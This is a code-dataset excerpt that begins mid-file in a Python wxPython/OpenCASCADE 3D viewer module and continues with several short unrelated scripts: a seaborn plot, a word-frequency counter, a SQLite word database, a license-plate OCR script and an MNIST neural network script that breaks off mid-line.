that the\n shape is displayed in the viewer.\n :param bool update: update viewer?\n :rtype: bool\n \"\"\"\n if not self.is_displayed(obj): # hidden OR not in_viewer\n if ensure_visible:\n self.display(obj, update=False, fit=False)\n else:\n return False # highlighting non-displayed items segfaults\n\n if (color is not None or fill_color is not None or\n display_mode is not None):\n style = Prs3d_Drawer().handle\n if color is not None:\n q_color = py_QuantityColor(color, str_default=None)\n style.SetColor(q_color)\n\n if fill_color is not None:\n fill_style = Graphic3d_AspectFillArea3d().handle\n fill_q_color = py_QuantityColor(fill_color, str_default=None)\n fill_style.SetInteriorColor(fill_q_color)\n\n style.SetBasicFillAreaAspect(fill_style)\n\n if display_mode is not None:\n if display_mode == \"default\":\n mode = -1\n else:\n mode = self.py_DisplayMode[display_mode]\n style.SetDisplayMode(mode)\n\n self._ais_context.HilightWithColor(obj, style, update)\n else:\n self._ais_context.Hilight(obj, update)\n\n return True\n\n def unhighlight(self, obj, update=True):\n \"\"\"Unhighlight a highlighted ``obj`` in the Viewer.\n\n :param OCC.wrapper.AIS.AIS_InteractiveObject obj: object\n to unhighlight.\n :param bool update: update viewer? (Default: `True`)\n :return: `True` if succesful, `False` otherwise (probably the shape\n was not highlighted).\n :rtype: bool\n \"\"\"\n restore_hidden = False\n if not (self.in_viewer(obj) and self.is_highlighted(obj)):\n return False\n\n if self.is_hidden(obj):\n # it does not go well when unhighlighting a hidden shape so,\n # without updating, we show the shape, unhighlight it, and restore\n # the hidden state\n restore_hidden = True\n self.display(obj, update=False, fit=False)\n\n # if not restoring, we should update after this call\n context = self._ais_context\n context.Unhilight(obj, False)\n # unhighlight might remove 'selected' highlighting, restored by:\n context.UpdateSelected(update and not restore_hidden)\n\n if restore_hidden:\n # if restoring, we only should update at this point\n self.hide(obj, update=update and restore_hidden, fit=False)\n return True\n\n # FIXME (TBD): Doesn't work too well, some isolines still show, leaves\n # objects in wireframe display mode\n # FIXME no black border in shaded mode.\n def unhighlight_all(self, update=True):\n self._v3d_viewer.UnHighlight()\n if update:\n self.update()\n # self._ais_context.UnhilightSelected(update)\n # self._ais_context.UnhilightCurrents(update)\n\n def enable_highlighting(self):\n warnings.warn(\"enable_highlighting is deprecated, \"\n \"use enable_highlight_selected instead!\",\n OCCDeprecationWarning, stacklevel=2)\n self.enable_highlight_selected()\n\n def disable_highlighting(self):\n warnings.warn(\"disable_highlighting is deprecated, \"\n \"use disable_highlight_selected instead!\",\n OCCDeprecationWarning, stacklevel=2)\n self.disable_highlight_selected()\n\n def disable_highlight_selected(self):\n self._ais_context.SetToHilightSelected(False)\n\n def enable_highlight_selected(self):\n self._ais_context.SetToHilightSelected(True)\n\n def highlighting_selected_enabled(self):\n return self._ais_context.ToHilightSelected()\n\n def enable_automatic_highlighting(self):\n \"\"\"Enable the automatic highlighting feature `AutomaticHilight`.\"\"\"\n self._ais_context.SetAutomaticHilight(True)\n\n def disable_automatic_highlighting(self):\n \"\"\"Disable the automatic highlighting feature `AutomaticHilight`.\"\"\"\n self._ais_context.SetAutomaticHilight(False)\n\n def automatic_highlighting_enabled(self):\n \"\"\"This is, by default, enabled and will make sure that,\n for instance, shapes are highlighted when hovering over them.\n \"\"\"\n return self._ais_context.AutomaticHilight()\n\n def toggle_axes(self):\n if self.triedron:\n self._v3d_view.TriedronErase()\n else:\n self.init_triedron()\n self.update()\n self.triedron = not self.triedron\n\n # TODO (RVD): test again once FreeImage and Gl2PS libraries are present\n # FIXME (TBD): investigate why bitmap images get corrupted\n def save_image(self, filename: str, width: int = None, height: int = None):\n \"\"\"Dump the full contents of the view at the same scale in the\n file ``filename``. The file name extension must be one of\n 'gif', 'bmp', 'jpg', 'png', 'pgf', 'ps', 'emf', 'svg', 'eps', 'tex',\n 'pdf'. Returns False when the dump has failed.\n\n :param filename: full pathname to image file.\n :param width: width of the image in pixels. Defaults to the width of\n the Viewer.\n :param height: height of the image in pixels. Defaults to the height\n of the Viewer.\n :rtype: bool\n \"\"\"\n filename = os.path.abspath(filename)\n _, ext = os.path.splitext(filename)\n ext = ext[1:].lower()\n if ext in VALID_BITMAP_EXTENSIONS_SET:\n pixmap = Image_AlienPixMap()\n viewer_size = self.Size\n w = width or viewer_size[0]\n h = height or viewer_size[1]\n\n # Creating an image through ToPixMap seems to have more consistent\n # behaviour on Linux\n success = self._v3d_view.ToPixMap(pixmap, w, h)\n if success:\n ascii_filename = TCollection_AsciiString(filename)\n success = pixmap.Save(ascii_filename)\n\n # TODO (PP): uncomment when vector export is supported again\n # elif ext in VALID_VECTOR_EXTENSIONS_SET:\n # format = ext_Graphic3d_ExportFormat[ext]\n # TODO (RvD): Changing to _v3d_view at least gets grey stuff.\n # /todo Maybe it is not rendered using OpenGl? Or another\n # /todo or maybe just something very different...\n # success = self._graphic3d_cview.Export(str(filename), format)\n # success = self._v3d_view.Export(str(filename), format)\n else:\n msg = \"File extension '.{}' not supported. Choose one of {}.\"\n raise RuntimeError(msg.format(ext, VALID_IMAGE_EXTENSIONS))\n\n if success:\n print(\"Saved image to:\", os.path.abspath(filename))\n else:\n msg = \"Saving image failed. Requested location: '{}'.\"\n self.logger.warning(msg.format(filename))\n\n return success\n\n def _conform_selection_mode(self, mode: Union[str, int]) -> int:\n if isinstance(mode, str):\n try:\n return NAME_TO_SEL_MODE[mode]\n except KeyError:\n raise ValueError(f\"Unknown selection mode! Supported modes: \"\n f\"{sorted(NAME_TO_SEL_MODE.keys())}. \"\n f\"Object: {self!r}\")\n elif isinstance(mode, int):\n return mode\n else:\n raise TypeError(f\"Selection mode should be a str or an int! \"\n f\"Got: {type(mode)!r}. Object: {self!r}\")\n\n def activate_selection_mode(self, mode: Union[str, int] = \"default\",\n obj: \"Handle_AIS_InteractiveObject\" = None,\n force=False):\n \"\"\"Activate a (sub-shape) selection mode for one or all objects\n currently in the viewer. Multiple modes can be activated at the\n same time.\n\n When calling this method without arguments, it resets the viewer to\n the default setting.\n\n :param mode: A string ('vertices', 'edges', ...., 'compounds' or\n 'default') specifying the mode to be activated. Here\n 'default' is the normal 'whole shape' selection mode.\n Alternatively specify an int, which will correspond to how it\n works in opencascade.\n :param obj: Object to activate the selection mode on. When not set,\n it will apply the selection mode on all objects currently\n displayed in the viewer.\n :param force:\n \"\"\"\n sel_mode = self._conform_selection_mode(mode)\n args = [obj, sel_mode] if obj else [sel_mode]\n self._ais_context.Activate(*args, force)\n\n def deactivate_selection_mode(self, mode: Union[str, int] = None,\n obj: \"Handle_AIS_InteractiveObject\" = None):\n \"\"\"Deactivate a (sub-shape) selection mode for one or all objects\n currently in the viewer.\n\n When calling this method without arguments, it removes all selection\n modes, including the 'default' one, making all objects non-selectable.\n\n :param mode: A string ('vertices', 'edges', ...., 'compounds' or\n 'default') specifying the mode to be deactivated. Here\n 'default' is the normal 'whole shape' selection mode.\n Alternatively specify an int, which will correspond to how it\n works in opencascade.\n :param obj: Object to deactivate the selection mode on. When not set,\n it will deactivate the selection mode on all objects currently\n displayed in the viewer.\n \"\"\"\n args = [obj] if obj else []\n if mode is not None:\n sel_mode = self._conform_selection_mode(mode)\n args.append(sel_mode)\n self._ais_context.Deactivate(*args)\n\n def get_active_selection_modes(\n self, obj: \"Handle_AIS_InteractiveObject\") -> Set[str]:\n \"\"\"Get the selection modes currently active on `obj`.\n\n .. note:: Currently only returns the modes as the names used\n by activate/ deactivate selection mode. Special modes not covered\n by these names, that would have been specified using integers,\n will appear as `None` in te end-results.\n \"\"\"\n modes = TColStd_ListOfInteger()\n self._ais_context.ActivatedModes(obj, modes)\n return set(map(SEL_MODE_TO_NAME.get, modes))\n\n def _mark_area(self, evt):\n x1_, y1_ = self._drag_x1_y1\n x2_, y2_ = evt.GetX(), evt.GetY()\n if x1_ <= x2_:\n x1, x2 = x1_, x2_\n else:\n x1, x2 = x2_, x1_\n if y1_ <= y2_:\n y1, y2 = y1_, y2_\n else:\n y1, y2 = y2_, y1_\n self._selected_area = (x1, y1, x2, y2)\n\n def _draw_rubberband(self):\n # use latency to not draw rectangle too often\n t2 = time.time()\n t1 = self._drag_t1\n if t2 - t1 < self.LATENCY:\n return\n else:\n self._drag_t1 = t2\n\n x1, y1, x2, y2 = self._selected_area\n x, y, w, h = x1, y1, x2 - x1, y2 - y1\n\n # self.dc.Clear()\n self.update()\n\n self._dc.DrawLineList(((x, y, x + w, y),\n (x + w, y, x + w, y + h),\n (x + w, y + h, x, y + h),\n (x, y + h, x, y)))\n\n # transparent rectangle not working...\n # rect = wx.Rect(x, y, w, h)\n # self.dc.DrawRectangle(rect)\n\n # ---- event handlers ----\n def OnKeyW(self, evt):\n self.set_display_mode_wireframe()\n\n def OnKeyS(self, evt):\n self.set_display_mode_shaded()\n\n def OnKeyF(self, evt):\n self.fit_all()\n\n def OnKeyQ(self, evt):\n self.set_display_mode_hlr()\n\n def OnKeyC(self, evt):\n if evt.ShiftDown():\n self.display_all()\n else:\n self.hide_all()\n\n def OnKeyA(self, evt):\n if evt.ControlDown():\n self.select_all()\n\n def OnKeyDEL(self, evt):\n self.hide_selected_objects()\n\n def onKeyESC(self, evt):\n self.deselect_all()\n\n def _schedule(self, callback, *args, **kwargs):\n # make sure there's a running Wx app\n app = wx.GetApp() or wx.App()\n\n wx.CallAfter(callback, *args, **kwargs)\n\n def OnSize(self, evt):\n self._schedule(self._OnSize)\n\n def _OnSize(self):\n self._v3d_view.MustBeResized()\n\n def OnPaint(self, evt):\n self._schedule(self._OnPaint)\n\n def _OnPaint(self):\n self._v3d_view.Update()\n\n def OnKeyDown(self, evt):\n code = evt.GetKeyCode()\n try:\n call_me = self._keymap[code]\n except KeyError:\n pass\n else:\n call_me(evt)\n\n def OnLeftDown(self, evt):\n self.left_m_down = True\n self.leftIsUp = False\n self.SetFocus()\n self._dragged = False\n self._drag_x1_y1 = x, y = evt.GetX(), evt.GetY()\n if evt.ShiftDown():\n self._drag_t1 = time.time()\n else:\n self._v3d_view.StartRotation(x, y)\n\n def OnLeftUp(self, evt):\n self.left_m_down = False\n shift_down = evt.ShiftDown()\n\n status = None\n if not self._dragged: # pure click\n status = self.select_under_mouse(evt.Position, shift=shift_down)\n elif self._selected_area: # small motions can be filtered out\n # self.dc.Clear()\n x1, y1, x2, y2 = self._selected_area\n status = self.select_area(x1, y1, x2, y2, shift=shift_down)\n self._selected_area = None\n\n if status is not None:\n evt_pos = evt.GetPosition()\n # 1. pure left-click background\n if status is AIS_SOP_NothingSelected:\n if not self._dragged: # filter out dragging\n if not shift_down: # filter out shift left-click\n evt = create_left_click_background_event(\n evt_pos)\n wx.PostEvent(self, evt)\n else:\n # something was really clicked\n if self._ais_context.HasDetected():\n # 2. left-clicked something, single object selected\n if status is AIS_SOP_OneSelected:\n evt = create_left_click_object_event(\n evt_pos, self.yield_selected(), False)\n wx.PostEvent(self, evt)\n # 3. left-clicked something, multiple objects selected\n elif status is AIS_SOP_SeveralSelected:\n evt = create_left_click_object_event(\n evt_pos, self.yield_selected(), True)\n wx.PostEvent(self, evt)\n\n def OnMiddleDown(self, evt):\n self._dragged = False\n self._drag_x1_y1 = evt.GetX(), evt.GetY()\n\n def OnRightDown(self, evt):\n self.right_m_down = True\n self._dragged = False\n self._drag_x1_y1 = evt.GetX(), evt.GetY()\n if evt.ShiftDown():\n self._drag_t1 = time.time()\n else:\n self._selected_area = None\n\n def OnRightUp(self, evt):\n self.right_m_down = False\n if not self._dragged: # pure click\n evt_pos = evt.GetPosition()\n if self._ais_context.HasDetected(): # right-clicked something\n it_detected = self.yield_detected()\n topmost_detected = next(it_detected) # top-most object\n # 1. right-clicked already selected objects\n if self._ais_context.IsSelected(topmost_detected):\n # don't select again, see if there were multiple selected\n it_selected = self.yield_selected()\n first = next(it_selected)\n try:\n second = next(it_selected)\n except StopIteration:\n multiple = False\n it = itertools.chain((first,), it_selected)\n else:\n multiple = True\n it = itertools.chain((first, second), it_selected)\n evt = create_right_click_object_event(\n evt_pos, it, multiple)\n wx.PostEvent(self, evt)\n # 2. right-clicked object that isn't selected yet\n else:\n # shift is irrelevant\n status = self.select_under_mouse(evt.Position, shift=False)\n if status is not AIS_SOP_OneSelected:\n msg = (\"Expected to right-click single object that \"\n \"wasn't already selected, didn't happend. \"\n \"Contact support@parapy.nl\")\n self.logger.warning(msg)\n else:\n evt = create_right_click_object_event(\n evt_pos, self.yield_selected(), False)\n wx.PostEvent(self, evt)\n # 3. right-clicked background\n else:\n # force clearing previous selection\n status = self.select_under_mouse(evt.Position, shift=False)\n if status is not AIS_SOP_NothingSelected:\n msg = (\"Expected to right-click background, but something \"\n \"was selected instead. Contact support@parapy.nl\")\n self.logger.warning(msg)\n else:\n evt = create_right_click_background_event(\n evt_pos)\n wx.PostEvent(self, evt)\n\n elif self._selected_area: # small motions can be filtered out\n # self.dc.Clear()\n x1, y1, x2, y2 = self._selected_area\n self.fit_window(x1, y1, x2, y2)\n self._selected_area = None\n\n def OnMotion(self, evt):\n if evt.Dragging():\n self._dragged = True\n if evt.LeftIsDown():\n # mode: area zoom\n if evt.ShiftDown():\n self._mark_area(evt)\n self._draw_rubberband()\n # mode: rotate\n else:\n x, y = evt.GetX(), evt.GetY()\n self._v3d_view.Rotation(x, y)\n elif evt.RightIsDown():\n # mode: area select\n if evt.ShiftDown():\n self._mark_area(evt)\n self._draw_rubberband()\n # mode: dynamic zoom\n else:\n x, y = evt.GetX(), evt.GetY()\n x_old, y_old = self._drag_x1_y1\n dy = y_old - y # positive is 'up'\n # ATTENTION: OCC does not understand y coordinate, use x\n self._v3d_view.Zoom(0, 0, dy, 0)\n self._drag_x1_y1 = y, y\n # mode: pan\n elif evt.MiddleIsDown():\n x, y = evt.GetX(), evt.GetY()\n x_old, y_old = self._drag_x1_y1\n dx = x - x_old\n dy = y_old - y # negative y\n self._v3d_view.Pan(dx, dy)\n self._drag_x1_y1 = x, y\n else:\n x, y = evt.GetX(), evt.GetY()\n self.move_to(x, y)\n\n def OnWheelScroll(self, evt):\n delta = evt.GetWheelDelta()\n rotation = evt.GetWheelRotation()\n rate = evt.GetLinesPerAction()\n shift_down = evt.ShiftDown()\n\n zoom_rate = rate * float(abs(rotation)) / delta\n\n if zoom_rate <= 0:\n zoom_rate = 0.2\n\n if shift_down: # precision zooming\n zoom_rate /= 10.\n\n zoom_factor = 1. + zoom_rate\n if rotation < 0: # take reciprocal for zooming out\n zoom_factor = 1. / zoom_factor\n\n self.zoom(zoom_factor)\n\n def OnEraseBackground(self, evt):\n pass\n\n def on_enter_window(self, evt):\n # This is done to make sure that when a pop-up is clicked away\n # with a right-click, no zooming will happen.\n self._drag_x1_y1 = evt.GetX(), evt.GetY()\n evt.Skip()\n\n\nclass ViewerWindow(wx.Frame):\n def __init__(self, show=True, title=\"ParaPy Graphical User Interface\"):\n wx.Frame.__init__(self, None, -1, title)\n self.viewer = Viewer(self)\n\n sizer = wx.BoxSizer(wx.VERTICAL)\n sizer.Add(self.viewer, 1, wx.EXPAND)\n self.SetSizer(sizer)\n self.SetAutoLayout(True)\n sizer.Layout()\n\n # do this after V3D_View has been created...\n self.Show(show)\n\n\nclass ZLayers(object):\n \"\"\"Object to manage Z-layers in :class:`Viewer`.\n\n >>> layers = viewer.zlayers\n >>> layers.layer_ids()\n [-5, 0, -2, -3, -4]\n >>> layers.top_most_layer_id()\n -4\n >>> layers.add_layer()\n 1\n >>> layers.layer_ids()\n [-5, 0, 1, -2, -3, -4]\n >>> layers.top_most_layer_id()\n -4\n >>> layers.top_most_layer_id(exclude_default_layers=True)\n 1\n >>> layers.remove_layer(1)\n\n .. note:: for developers, default V3d_Viewer layers are (from btm to top):\n\n * -5: Graphic3d_ZLayerId_BotOSD\n * 0: Graphic3d_ZLayerId_Default\n * -2: Graphic3d_ZLayerId_Top\n * -3: Graphic3d_ZLayerId_Topmost\n * -4: Graphic3d_ZLayerId_TopOSD\n \"\"\"\n\n def __init__(self, v3d_viewer):\n self._v3d_viewer = v3d_viewer\n\n def layer_ids(self, exclude_default_layers=False):\n \"\"\"Return all Z layer ids in sequence ordered by overlay level from\n lowest layer to highest (foreground). The first layer ID in sequence\n is the default layer that can't be removed. Optionally, you can\n ``exclude_default_layers``, which will only return ids of layers added\n after the Viewer was created. This can be an empty list.\n\n :rtype: list[int]\n \"\"\"\n ids = TColStd_SequenceOfInteger()\n self._v3d_viewer.GetAllZLayers(ids)\n if exclude_default_layers:\n # OCC default layers are all <= 0\n return [i for i in ids if i > 0]\n else:\n return list(ids)\n\n def top_most_layer_id(self, exclude_default_layers=False):\n \"\"\"Get top-most layer id. Optionally, you can\n ``exclude_default_layers``, which will limit search to only those\n layers added after the Viewer was created. If no layers were added,\n :py:`None` is returned.\n\n :rtype: int | None\n \"\"\"\n lst = self.layer_ids(exclude_default_layers=exclude_default_layers)\n if lst:\n return lst[-1]\n else:\n return None\n\n def add_layer(self):\n \"\"\"Add a new top-level Z layer and get its ID.\n\n :rtype: int\n :raises RuntimeError: if layer couldn't be created.\n \"\"\"\n flag, layer_id = self._v3d_viewer.AddZLayer()\n if not flag:\n raise RuntimeError(\"Layer couldn't be created\")\n return layer_id\n\n def remove_layer(self, layer_id):\n \"\"\"Remove Z layer by it's ``layer_id``.\n\n :param int layer_id:\n :raises RuntimeError: if layer couldn't be removed, by default there\n are always default bottom-level layer(s) that can't be removed.\n \"\"\"\n flag = self._v3d_viewer.RemoveZLayer(layer_id)\n if not flag:\n raise RuntimeError(\"Layer couldn't be removed\")\n return layer_id\n\n\nif __name__ == '__main__':\n from OCC.wrapper.BRepPrimAPI import (\n BRepPrimAPI_MakeBox, BRepPrimAPI_MakeSphere)\n\n app = wx.GetApp() or wx.App(False)\n wx.SafeYield()\n frame = ViewerWindow()\n viewer = frame.viewer\n\n box = BRepPrimAPI_MakeBox(1, 2, 3)\n sphere = BRepPrimAPI_MakeSphere(1)\n\n ais_shape1 = viewer.display_topods_shape(box.Shape())\n ais_shape2 = viewer.display_topods_shape(sphere.Shape())\n ais_trihedron1 = viewer.display_trihedron((2, 2, 0), zoom_persistent=True)\n ais_trihedron2 = viewer.display_trihedron((3, 3, 0), zoom_persistent=False)\n ais_text = viewer.display_text(\"Value: 1.0\", (1.5, 1, 0), top_most=True)\n ais_text = viewer.display_text(\"Value: 2.0\", (2.0, 1, 0), top_most=True)\n # viewer.highlight(ais_shape1, \"red\")\n\n # viewer.add_clipplane((0, 0, 0.3), (0, 0, 1))\n # viewer.add_clipplane((0, 0, 0.4), (0, 0, -1))\n\n frame.Maximize()\n frame.Raise()\n app.SetTopWindow(frame)\n\n app.MainLoop()\n","repo_name":"msaezo/KBE","sub_path":"PythonFolder/venv/Lib/site-packages/OCC/gui/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":80372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10999785433","text":"import seaborn as sns\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\n\n# 生成300个数据\nx = np.random.random_integers(0, 7, 300)\n# 随机0,1\nsex = np.random.randint(0, 2, 300)\n# y = np.random.random(300)*10\ny = np.abs(np.random.normal(0, 2, 300))\nprint(y)\nr = pd.value_counts(y)\n# print(r)\ndata = pd.DataFrame(x, columns=[\"x\"])\ndata[\"y\"] = y\ndata[\"sex\"] = sex\nprint(data)\n# 两种方法生成 分类 如下图\n# sns.stripplot(x=\"x\", y=\"y\", data=data, jitter=True)\nsns.swarmplot(x=\"x\", y=\"y\", hue=\"sex\", data=data)\nplt.show()\n","repo_name":"dyanfee/pyLearn","sub_path":"Seaborn/text4.py","file_name":"text4.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41387136468","text":"import re\r\nimport string\r\n\r\nfilename = \"CS210_Project_Three_Input_File.txt\" #assign the input file name\r\nwriteFile = \"frequency.dat\" #assign the output file name\r\nf = open(filename, \"r\") #open and reads input data file\r\nw = open(writeFile, \"w\") #open and writes to output file\r\ndata = f.read() #read input file\r\nlist_of_items = data.split() #split the data into individual items & store them in a list\r\nfrequency = {} #dictionary to store item:frequeny\r\n \r\n#Method to return a list which contains each items and their quanities in the list\r\ndef get_frequency_of_each_item():\r\n\r\n #Calculating the quantity\r\n for item in list_of_items:\r\n frequency[item] = frequency.get(item,0)+1 \r\n \r\n return_string = \"\" \r\n\r\n #Appending data to return string\r\n for item,freq in frequency.items():\r\n return_string += item + \": \" + str(freq) + '\\n' \r\n\r\n #Write to frequency file\r\n w.write(return_string)\r\n #Print\r\n print(return_string)\r\n \r\n#Method to returns a string which contains a specific item and its quantity \r\ndef get_frequency_of_single_item(item_name):\r\n\r\n #Sets the input to capitalized first letter and lower case rest no matter the input\r\n item_name = item_name.capitalize()\r\n\r\n for item in list_of_items:\r\n frequency[item] = frequency.get(item,0)+1 \r\n \r\n #if statement if given item is present in the string\r\n if item_name in frequency: \r\n print(\"Qty of \" + item_name + \" sold: \", end=\"\")\r\n return frequency[item_name]\r\n\r\n #else statement if there is no match item\r\n else:\r\n print(\"Qty of \" + item_name + \" sold: \", end=\"\")\r\n return 0\r\n \r\n#Method to return a histogram which contains each items and their quanities in the list. \r\ndef display_histogram():\r\n\r\n for item in list_of_items:\r\n frequency[item]= frequency.get(item,0)+1\r\n \r\n ans=\"\"\r\n\r\n #appending item, '*' no.of times the item occures and aligning ':' for a unform look\r\n for item,freq in frequency.items():\r\n ans += '%15s' % item + \": \" + '*'* freq + '\\n'\r\n \r\n w.write(ans)\r\n print(ans)\r\n\r\n \r\n","repo_name":"mfox88/CPlusPlusProgram","sub_path":"PythonCode.py","file_name":"PythonCode.py","file_ext":"py","file_size_in_byte":2312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32914529485","text":"import sqlite3\nfrom sqlite3 import Error\nfrom random import seed, randint\nfrom time import time\nfrom os import path\n\nclass Database:\n seed(time())\n __DB_LOCATION = path.join(path.realpath('.'),\"data\",\"typing.db\")\n __CSV_LOCATION = path.join(path.realpath('.'),\"data\",\"words.csv\")\n __create_word_table_query = \"\"\"CREATE TABLE IF NOT EXISTS words (\n id integer PRIMARY KEY,\n name text NOT NULL\n );\"\"\"\n\n __LOG_DB_LOCATION = path.join(path.realpath('.'),\"data\",\"log.db\")\n __create_log_table_query = \"\"\"CREATE TABLE IF NOT EXISTS log (\n id INTEGER PRIMARY KEY, \n freq INTEGER, \n error_count INTEGER\n );\"\"\"\n\n __STATS_DB_LOCATION = path.join(path.realpath('.'),\"data\",\"stats.db\")\n __create_stats_table_query = \"\"\"CREATE TABLE IF NOT EXISTS stats (\n id INTEGER PRIMARY KEY, \n date_created DATETIME\n );\"\"\"\n\n WORDS_TABLE = \"words\"\n WORDS_TABLE_COLS = \"id, name\"\n\n def __init__(self):\n self.__conn = self.__create_connection(self.__LOG_DB_LOCATION)\n self.__cursor = self.__conn.cursor()\n self.__create_log_table()\n\n self.__conn = self.__create_connection(self.__STATS_DB_LOCATION)\n self.__cursor = self.__conn.cursor()\n self.__create_stats_table()\n\n self.__conn = self.__create_connection(self.__DB_LOCATION)\n self.__cursor = self.__conn.cursor()\n self.__create_word_table()\n\n self.__init_words()\n \n def __create_connection(self, db_file):\n \"\"\"connect to db path\"\"\"\n conn = None\n try:\n conn = sqlite3.connect(db_file)\n print(sqlite3.version)\n except Error as e:\n print(e)\n finally:\n return conn\n def select_all_from_table(self, table):\n sql_command = \"\"\"SELECT * FROM {}\"\"\".format(table)\n self.__cursor.execute(sql_command)\n return self.__cursor.fetchall()\n \n def select_random_word(self):\n return self.select_by_id(self.WORDS_TABLE, randint(1,1000))\n \n def select_random_phrase(self, length):\n phrase = \"\"\n while length > 0:\n phrase += self.select_random_word()[1]\n if length > 1:\n phrase += \" \"\n length-=1\n return phrase\n\n def select_by_id(self, table, id):\n \"\"\"\n fetches first matching id\n \"\"\"\n sql_command = \"\"\"SELECT * FROM {} WHERE id=?\"\"\".format(table)\n rows = self.__cursor.execute(sql_command,(id,)).fetchone()\n return rows\n\n def select_by_custom(self, table, condition):\n pass\n\n def close(self):\n self.__conn.close()\n \n def __create_word_table(self):\n try:\n self.__cursor.execute(\n self.__create_word_table_query\n )\n except Error as e:\n print(e)\n\n def __create_log_table(self):\n try:\n self.__cursor.execute(\n self.__create_log_table_query\n )\n except Error as e:\n print(e)\n\n def __create_stats_table(self):\n try:\n self.__cursor.execute(\n self.__create_stats_table_query\n )\n except Error as e:\n print(e)\n\n def __init_words(self):\n words = self.select_by_id(self.WORDS_TABLE, 1)\n if words is None:\n # parse csv\n with open(self.__CSV_LOCATION,'r') as reader:\n for id, line in enumerate(reader.readlines(), start=0):\n line = line.strip('\\n\\r')\n self.insert_data(self.WORDS_TABLE, self.WORDS_TABLE_COLS, (id,line))\n \n\n def insert_data(self, table, columns,data):\n \"\"\"inserts data into a table. will error if table does not exist\n :param table string TABLE NAME:\n :param columns COLUMNS corresponding to table. should be a string that is comma separated: \n :param data two-dimensional list of data rows that corresponds with the selected table: \n :returns newly inserted row's ID: \"\"\"\n\n col_num = \"?\"+(\",?\"*columns.count(\",\"))\n sql_command = \"\"\"INSERT INTO {}({}) VALUES({})\"\"\".format(table, columns,col_num)\n self.__cursor.execute(sql_command, data)\n self.__conn.commit()\n \n\n\nif __name__==\"__main__\":\n db = Database()\n random_word = db.select_random_phrase(3)\n print(random_word)\n db.close()\n","repo_name":"calmcoconut/typing-trainer","sub_path":"sql_model.py","file_name":"sql_model.py","file_ext":"py","file_size_in_byte":5302,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"7224948787","text":"from utils.anpr import ANPR\nfrom imutils import paths\nimport argparse\nimport imutils\nimport cv2\n\ndef cleanup_text(text):\n\treturn \"\".join([c if ord(c) < 128 else \"\" for c in text]).strip()\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--input\", required=True,\n\thelp=\"path to input directory of images\")\nap.add_argument(\"-d\", \"--debug\", type=int, default=-1,\n\thelp=\"whether or not to show additional visualizations\")\nargs = vars(ap.parse_args())\n\n\nanpr = ANPR(debug=args[\"debug\"] > 0)\nimagePaths = sorted(list(paths.list_images(args[\"input\"])))\n\nfor imagePath in imagePaths:\n\n\timage = cv2.imread(imagePath)\n\timage = imutils.resize(image, width=600)\n\t\n\t(lpText, bbox) = anpr.find_and_ocr(image)\n\t\n\tif lpText is not None and bbox is not None:\n\t\t\n\t\t(x, y, w, h) = bbox\n\t\tcv2.rectangle(image, (x ,y), (x+w ,y+h ), (255, 0, 0), 3)\n\t\tcv2.putText(image, cleanup_text(lpText), (x, y - 15),\n\t\t\tcv2.FONT_HERSHEY_SIMPLEX, 0.75, (0, 255, 0), 2)\n\t\t\n\t\tprint(\"[INFO] {}\".format(lpText))\n\t\tcv2.imshow(\"Output ANPR\", image)\n\t\tcv2.imwrite('Output/'+imagePath.split(\"/\")[-1],image)\n\t\tcv2.waitKey(0)\t","repo_name":"pranshu97/ANPR","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41312879022","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Feb 4 10:21:40 2020\nhttp://neuralnetworksanddeeplearning.com/chap1.html\n@author: martijn\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport random\n\n# load classes\nfrom MNISTDataLoader import MNISTDataLoader\nfrom NeuralNetworkFast import NeuralNetwork\n\npath = 'D:/Master/'\nnumImagesTrain = 60000 # max 60000\nnumImagesTest = 10000 # max 10000\nbatchSize = 30 # number of images used before updating the weights of the network\neta = 1 # learning rate\nepochs = 30 # number of times to loop trough the test images\nNetworkNeurons = [784,30,20,10] # begin must be 784, end must be 10 everthing in between can be random\nSaveResults2textfile = False # save network parameters and results in .txt file\n\n# Create an image with some of the wornly identified numbers by the neural network\n# The imagec contains the first numrow*numcol wronly identified images from the \n# testdata set\nCreateWrongIdentifiedPicturs = True # True when one the image\nnumrow = 6 # number of rows within the subplot of wronly identified images\nnumcol = 4 # number of colums within the subplot of wronly identified images\n\n# Loading and decoding data\ndataloader = MNISTDataLoader()\ntestImage = dataloader.readBinaryFile2DataMatrix('Test',path,16,numImagesTest) \ntestLabel = dataloader.readBinaryFile2LabelMatrix('Test',path,8,numImage = numImagesTest) \ntrainImages = dataloader.readBinaryFile2DataMatrix('Train',path,16,numImage = numImagesTrain)\ntrainLabels = dataloader.readBinaryFile2LabelMatrix('Train',path,8,numImage = numImagesTrain)\n\n# Create neural network and train the network using stochastic gradient descent method\nNetworkTest = NeuralNetwork(NetworkNeurons)\nNetworkTest.sgd(trainImages/255,trainLabels,batchSize,epochs,eta,testImage/255,testLabel,SaveResults2textfile)\n\n# Create image of wronly identified numbers\nif CreateWrongIdentifiedPicturs:\n fig, axs = plt.subplots(numcol, numrow)\n col = 0\n row = 0\n a = np.zeros((784,1))\n b = np.zeros((10,1))\n \n for ii in range(0,numImagesTest):\n # This could be vectorized, but the code does not yet suffer from a slowdown\n a[:,:] = np.reshape(testImage[:,ii],(784,1))\n b[:,:] = np.reshape(testLabel[:,ii],(10,1))\n r = NetworkTest.evaluate(a,b) \n # returns a float, however as we only test one image we are certain the \n # result is either a zero or a one (no floating point errors)\n if r == 0:\n # label and recognised number are diffrent, create image of this instance\n numberNeuralNetwork = NetworkTest.NetworkOutput2Number(NetworkTest.feedforward(a))[0]\n axs[col, row].imshow(np.reshape(a,(28,28)),cmap='gray', vmin=0, vmax=255)\n axs[col, row].set_title('Label: '+str(dataloader.labelVector2number(b))+\n ' Network: 